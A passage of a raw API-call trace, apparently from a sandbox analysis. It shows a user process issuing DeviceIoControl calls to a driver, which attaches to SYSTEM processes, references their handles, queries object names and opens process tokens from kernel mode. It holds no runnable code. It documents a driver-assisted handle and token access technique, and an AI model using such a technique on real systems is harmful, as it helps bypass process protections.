ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.337] ObfDereferenceObject (Object=0xfffff8a001da49c0) returned 0x1 [0222.337] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.337] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.337] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.337] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.337] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.337] PsAcquireProcessExitSynchronization () returned 0x0 [0222.337] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.337] ObReferenceObjectByHandle (in: Handle=0x884, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001a20fc0, HandleInformation=0x0) returned 0x0 [0222.337] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.337] PsReleaseProcessExitSynchronization () returned 0x2 [0222.337] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.337] ObQueryNameString (in: Object=0xfffff8a001a20fc0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.337] ObfDereferenceObject (Object=0xfffff8a001a20fc0) returned 0x1 [0222.337] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.337] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.337] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.337] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.337] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.337] PsAcquireProcessExitSynchronization () returned 0x0 [0222.337] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.337] ObReferenceObjectByHandle (in: Handle=0x89c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0028f2850, HandleInformation=0x0) returned 0x0 [0222.337] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.338] PsReleaseProcessExitSynchronization () returned 0x2 [0222.338] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.338] ObQueryNameString (in: Object=0xfffff8a0028f2850, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.338] ObfDereferenceObject (Object=0xfffff8a0028f2850) returned 0x1 [0222.338] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.338] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.338] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.338] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.338] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.338] PsAcquireProcessExitSynchronization () returned 0x0 [0222.338] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.338] ObReferenceObjectByHandle (in: Handle=0x8ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001cf86f0, HandleInformation=0x0) returned 0x0 [0222.338] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.338] PsReleaseProcessExitSynchronization () returned 0x2 [0222.338] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.338] ObQueryNameString (in: Object=0xfffff8a001cf86f0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.338] ObfDereferenceObject (Object=0xfffff8a001cf86f0) returned 0x1 [0222.338] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.338] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.338] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.338] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.339] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.339] PsAcquireProcessExitSynchronization () returned 0x0 [0222.339] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.339] ObReferenceObjectByHandle (in: Handle=0x8d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0028b69f0, HandleInformation=0x0) returned 0x0 [0222.339] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.339] PsReleaseProcessExitSynchronization () returned 0x2 [0222.339] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.339] ObQueryNameString (in: Object=0xfffff8a0028b69f0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.339] ObfDereferenceObject (Object=0xfffff8a0028b69f0) returned 0x1 [0222.339] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.339] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.339] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.339] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.339] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.339] PsAcquireProcessExitSynchronization () returned 0x0 [0222.339] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.339] ObReferenceObjectByHandle (in: Handle=0x9ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0025f0840, HandleInformation=0x0) returned 0x0 [0222.339] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.339] PsReleaseProcessExitSynchronization () returned 0x2 [0222.339] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.339] ObQueryNameString (in: Object=0xfffff8a0025f0840, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.340] ObfDereferenceObject (Object=0xfffff8a0025f0840) returned 0x1 [0222.340] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.340] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.340] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.340] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.340] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.340] PsAcquireProcessExitSynchronization () returned 0x0 [0222.340] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.340] ObReferenceObjectByHandle (in: Handle=0x9d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a002b8f260, HandleInformation=0x0) returned 0x0 [0222.340] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.340] PsReleaseProcessExitSynchronization () returned 0x2 [0222.340] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.340] ObQueryNameString (in: Object=0xfffff8a002b8f260, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.340] ObfDereferenceObject (Object=0xfffff8a002b8f260) returned 0x1 [0222.340] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.340] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0xc8 [0222.340] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0222.340] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800bafe630, HandleInformation=0x0) returned 0x0 [0222.340] ObOpenObjectByPointer (in: Object=0xfffffa800bafe630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000083c) returned 0x0 [0222.340] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6c [0222.341] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000083c, DesiredAccess=0x8, TokenHandle=0xfffffa80036dff00 | out: TokenHandle=0xfffffa80036dff00*=0xc4) returned 0x0 [0222.341] ZwClose (Handle=0xffffffff8000083c) returned 0x0 [0222.341] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.341] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0222.341] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0222.343] CloseHandle (hObject=0xc4) returned 1 [0222.343] CloseHandle (hObject=0xc8) returned 1 [0222.343] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.343] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0222.343] PsLookupProcessByProcessId (in: ProcessId=0x1ac, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.343] PsAcquireProcessExitSynchronization () returned 0x0 [0222.343] KeStackAttachProcess (in: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880052b35d0) [0222.343] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003577a80, HandleInformation=0x0) returned 0x0 [0222.343] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.343] PsReleaseProcessExitSynchronization () returned 0x2 [0222.343] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6a [0222.343] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.343] ObfDereferenceObject (Object=0xfffffa8003577a80) returned 0x1 [0222.344] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.344] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.344] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.344] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.344] PsLookupProcessByProcessId (in: ProcessId=0x1ac, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.344] PsAcquireProcessExitSynchronization () returned 0x0 [0222.344] KeStackAttachProcess (in: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880052b35d0) [0222.344] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038f1500, HandleInformation=0x0) returned 0x0 [0222.344] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.344] PsReleaseProcessExitSynchronization () returned 0x2 [0222.344] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6a [0222.344] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.344] ObfDereferenceObject (Object=0xfffffa80038f1500) returned 0x1 [0222.344] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.344] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0xc8 [0222.344] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0222.345] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003498b30, HandleInformation=0x0) returned 0x0 [0222.345] ObOpenObjectByPointer (in: Object=0xfffffa8003498b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000083c) returned 0x0 [0222.345] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7b [0222.345] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000083c, DesiredAccess=0x8, TokenHandle=0xfffffa80036dff00 | out: TokenHandle=0xfffffa80036dff00*=0xc4) returned 0x0 [0222.345] ZwClose (Handle=0xffffffff8000083c) returned 0x0 [0222.345] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.345] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0222.345] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0222.347] CloseHandle (hObject=0xc4) returned 1 [0222.347] CloseHandle (hObject=0xc8) returned 1 [0222.347] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.347] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0222.347] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.347] PsAcquireProcessExitSynchronization () returned 0x0 [0222.347] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.347] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800358cea0, HandleInformation=0x0) returned 0x0 [0222.347] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.348] PsReleaseProcessExitSynchronization () returned 0x2 [0222.348] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.348] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.348] ObfDereferenceObject (Object=0xfffffa800358cea0) returned 0x1 [0222.348] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.348] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.348] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.348] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0222.348] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.348] PsAcquireProcessExitSynchronization () returned 0x0 [0222.348] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.348] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800d8718e0, HandleInformation=0x0) returned 0x0 [0222.348] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.348] PsReleaseProcessExitSynchronization () returned 0x2 [0222.348] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.348] ObQueryNameString (in: Object=0xfffffa800d8718e0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.348] ObfDereferenceObject (Object=0xfffffa800d8718e0) returned 0x1 [0222.348] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.348] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.348] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.348] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0222.349] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.349] PsAcquireProcessExitSynchronization () returned 0x0 [0222.349] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.349] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003657dd0, HandleInformation=0x0) returned 0x0 [0222.349] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.349] PsReleaseProcessExitSynchronization () returned 0x2 [0222.349] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.349] ObQueryNameString (in: Object=0xfffffa8003657dd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.349] ObfDereferenceObject (Object=0xfffffa8003657dd0) returned 0x2 [0222.349] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.349] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.349] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.349] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0222.349] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.349] PsAcquireProcessExitSynchronization () returned 0x0 [0222.349] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.349] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003652f20, HandleInformation=0x0) returned 0x0 [0222.349] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.349] PsReleaseProcessExitSynchronization () returned 0x2 [0222.349] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.349] ObQueryNameString (in: Object=0xfffffa8003652f20, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.349] ObfDereferenceObject (Object=0xfffffa8003652f20) returned 0x1 [0222.350] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.350] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.350] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.350] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.350] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.350] PsAcquireProcessExitSynchronization () returned 0x0 [0222.350] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.350] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003497970, HandleInformation=0x0) returned 0x0 [0222.350] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) 